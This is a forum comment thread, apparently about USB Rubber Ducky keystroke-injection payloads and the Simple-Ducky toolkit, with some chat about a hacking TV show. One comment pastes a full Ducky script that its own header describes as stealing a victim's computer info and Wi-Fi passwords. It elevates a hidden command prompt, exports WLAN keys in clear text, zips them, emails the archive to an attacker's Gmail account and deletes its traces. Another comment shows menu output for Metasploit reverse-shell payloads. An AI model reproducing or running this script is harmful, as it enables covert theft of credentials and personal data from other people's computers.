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  1. Good luck with this guys i have not been able to do this myself with the same results.
  2. Second episode was pretty good it reminded me of when i was 12 messing around with custom built trojans and burning them on a CD and leaving them laying around back in the day that episode showed a clever way of Social Engineering that instance. What a great show, to bad the world is still not ready for such brilliance.
  3. This was on Kali Linux when I got those issues I update and upgrade every time log into the VM yea it's on Parallels VM
  4. 3. Metasploit Executable (Good | Gets dinged by most AV | Meterpreter or Standard Shell) 4. No Download Reverse Shell (Great | Long build time) Option: 3 Would you like a meterpreter or standard shell[ met | std ]? **whether you choose met or std you get the same ERROR** Metasploit is generating your payload, this will take a moment... /usr/bin/simple-ducky: line 5808: msfpayload: command not found /usr/bin/simple-ducky: line 5808: msfencode: command not found Encoder Version: v2.6 Simple-Ducky Version: v1.1.1
  5. Is this great looking Payload still working? i ran it and it gets hung on UA and then sending me a email. Reds out during writing heres what i have. REM Author: Zeta REM Date: 4/5/15 REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail. REM------------------------OPEN & HIDE------------------------ DELAY 750 GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 555 ALT y DELAY 555 ENTER ENTER ALT SPACE STRING M DOWNARROW REPEAT 111 ENTER REM ----------------------COLLECT & DUMP---------------------- STRING set TEMPDIR=%systemdrive%\de-temp ENTER STRING mkdir %TEMPDIR% ENTER STRING cd %TEMPDIR% ENTER STRING netsh wlan export profile key=clear ENTER STRING set > info.txt ENTER STRING cd.. ENTER REM ---------------------------------------------ZIPPING FILE--------------------------------------------- DELAY 450 STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs ENTER STRING echo InputFolder = objArgs(0) >> _zipIt.vbs ENTER STRING echo ZipFile = objArgs(1) >> _zipIt.vbs ENTER STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs ENTER STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs ENTER STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs ENTER STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs ENTER STRING echo wScript.Sleep 2000 >> _zipIt.vbs ENTER STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip ENTER DELAY 200 REM -----------------------------------EMAIL LOG VIA GMAIL----------------------------------- STRING powershell.exe -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ishineblue', 'PWHERE'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'ishineblue@gmail.com'; $ReportEmail.To.Add('ishineblue@gmail.com'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM ---------------------DELETE AND END--------------------- STRING RD /S /Q "%systemdrive%\de-temp" ENTER STRING TYPE nul > %systemdrive%\de-temp.zip ENTER STRING DEL /Q %systemdrive%\de-temp.zip ENTER STRING TYPE nul > %systemdrive%\_zipIt.vbs ENTER STRING DEL /Q %systemdrive%\_zipIt.vbs ENTER STRING exit ENTER
  6. Sorry 1337hacker420blazeit no one here is going to teach you how to write the payloads they only advise you on mistakes of those loads and such. So if you don't know any code you basically bought a 40 dollar chip till you can code something on your own. Just copy and paste what you find and tweak the delays.
  7. I enjoyed Ep.1 it think its a fresh new perspective on hacking / penetration test and the fact that he is not a normal person with a METH addiction is brilliant. I just don't think the world is ready for Terminal yet, i give it One season maybe two tops.
  8. I don't know why but i think that Toolkit needs some serious work.
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